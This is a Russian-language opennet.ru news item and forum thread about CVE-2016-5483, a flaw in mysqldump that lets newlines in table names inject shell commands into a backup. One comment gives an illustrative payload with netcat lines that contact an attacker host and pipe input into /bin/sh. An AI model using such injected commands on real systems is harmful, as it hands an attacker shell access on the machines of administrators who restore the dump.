https://www.opennet.ru/openforum/vsluhforumID3/110659.html Во входящей в состав MySQL утилите mysqldump (http://dev.mysql.com/doc/refman/5.7/en/mysqldump.html), используемой для создания резервных копий, выявлена (https://blog.tarq.io/cve-2016-5483-backdooring-mysqldump-backups/) уязвимость (CVE-2016-5483 (https://security-tracker.debian.org/tracker/CVE-2016-5483)), позволяющая <br>организовать выполнение произвольных shell-команд или привилегированных конструкций SQL во время восстановления резервной копии при помощи утилиты mysql. Код выполнятся с правами администратора, запустившего mysql. Уязвимостью может воспользоваться пользователь СУБД, имеющий права на создание таблиц. <br><br><br><br><br>Проблема вызвана особенностью добавления комментариев с названиями таблиц в выводе mysqldump. Атакующий имеет возможность создать таблицу с переводом строки в имени, что приведёт к тому, что в область комментария попадёт только начало имени, а хвост будет перенесён на другую строку и выполнен при загрузке дампа. Например, атакующий может создать таблицу с именем "evil &#92;! id select https://www.opennet.ru/openforum/vsluhforumID3/110659.html#79 Tue, 14 Mar 2017 11:27:04 GMT Отложить в сторонку хеш пароля пользователя, установить случайный длинный, прийти под этим паролем, поднять дамп, вернуть хеш на место - это как-то уже слишком сложно, да?<br> https://www.opennet.ru/openforum/vsluhforumID3/110659.html#78 Mon, 13 Mar 2017 14:10:03 GMT &gt; d:\windows_server\setup.exe ?<br><br>mysql в ней ровно тот же самый и из того же источника.<br>А mssql для вебни (не внутрикорпоративной, с пятикилобайтной "строкой" sql-запроса, но и с аж пятью пользователями, которых можно просто заставить не запускать ее одновременно с пяти мест, а паблик, с тысячами пользователей и примитивными insert/delete по полста в секунду) - боюсь, как бы не оказался еще худшим рeшетом, и еще большим тормозом и сборищем глюков.<br><br>И в любом случае это отдельная жизнь, не каждому админу lamp-серверов она дана.<br>(обратное тоже верно, судя по спаму, попершему пачками с хостингов гарант-парка)<br> https://www.opennet.ru/openforum/vsluhforumID3/110659.html#76 Mon, 13 Mar 2017 13:04:26 GMT ...только реалистичный, а не код, создающий динамически таблицы с подстановкой пользовательского ввода. :) С таким проблемы начнутся куда раньше.<br> https://www.opennet.ru/openforum/vsluhforumID3/110659.html#75 Mon, 13 Mar 2017 13:00:07 GMT В дамп из-за sql injection? Ну-ка наваляйте proof of concept.<br> https://www.opennet.ru/openforum/vsluhforumID3/110659.html#74 Mon, 13 Mar 2017 10:24:15 GMT &gt; Ну, всё, конец света, вырубайте комп. А прогнать дамп на поиск сочетания <br>&gt; нежелательных ключевых слов не судьба?<br><br>а в дампе - статья с опеннета, описывающая проблему.<br>(ну либо вовсе статья о разработке/администреже mysql)<br>Причем она начинается со второго гигабайта этого дампа.<br><br>Тебе нужен полноценный парсер sql-синтаксиса, старательно обходящий ескейпинги, нерегулярности и чудеса собственно mysqldump. Та еще жопа. Я до сих пор бережно храню regex, вырезающий из дампа (статичного и с точно известной начинкой) нужные поля, сам ниасилил.<br><br> https://www.opennet.ru/openforum/vsluhforumID3/110659.html#73 Mon, 13 Mar 2017 10:15:06 GMT &gt; MySQL - Legacy РСБД с грязными хаками как IE6 для веб-макак.<br><br>была бы она не для веб-макак, было бы пофигу, что там нет нормального restore. Энтерпрайзную базу я восстанавливаю без особой опаски - туда чужие не ходят.<br><br>&gt; Не имеет ничего общего со стандартизированными или современными решениями включая PgSQL. <br><br>о, да. vacuum full не имеет (сколько лет вам читают мантру что он deprecated, и мы его <br>вообще скоро уберем, если не в следующей версии, то хотя бы через одну - точно?)<br>Если что - эта радость, вместе с форматом хранения, вызвавшим ее к жизни, унаследована от postgres95 (и да, это год, а предыдущее слово говорит, кто и зачем эту хрень придумал), где у ее существования было вполне понятное <br>основание, а идеи использовать ЭТО в продакшне у тех постдоков не было и быть не могло, исключительно исследовательский проект для написания диссера (и докторской руководителем).<br><br><br><br> https://www.opennet.ru/openforum/vsluhforumID3/110659.html#72 Mon, 13 Mar 2017 10:05:23 GMT &gt; Если дамп мой - я и так знаю, что в нем.<br><br>в нем - create table shit<br> \!nc hackhost 6666 /dev/null <br> \!nc -l 6666 &#124; /bin/sh<br> somemoreshit (...<br><br>попавший туда из-за sql-injection в забытом тобой же три года назад в недрах сайта одноразовом тестовом скрипте. И ты об этом вряд ли узнаешь. А при таком апломбе - ты об этом не узнаешь даже когда тебя таким образом поимеют, поскольку самомнения дохрена, а умения читать и делать выводы из прочитанного - ноль.<br><br>одна надежда, что оракл о тебе позаботится.<br><br>Единственный "твой" дамп, который по настоящему твой - это который ты руками набрал по одной буковке.<br> https://www.opennet.ru/openforum/vsluhforumID3/110659.html#71 Mon, 13 Mar 2017 07:15:04 GMT Очень даже может быть. Но в таких случаях обычно звучит что-то вроде "я же не админ, чтобы читать сообщение об ошибке". <br> https://www.opennet.ru/openforum/vsluhforumID3/110659.html#70 Mon, 13 Mar 2017 07:13:02 GMT &gt; apt-get remove mysqld ?<br><br>apt-get remove работает с именами пакетов, а не бинарей на диске. <br><br>&gt; d:\windows_server\setup.exe ?<br><br>Ну это тебе виднее, последний windows server, который я ставил, был 2003-й. <br><br>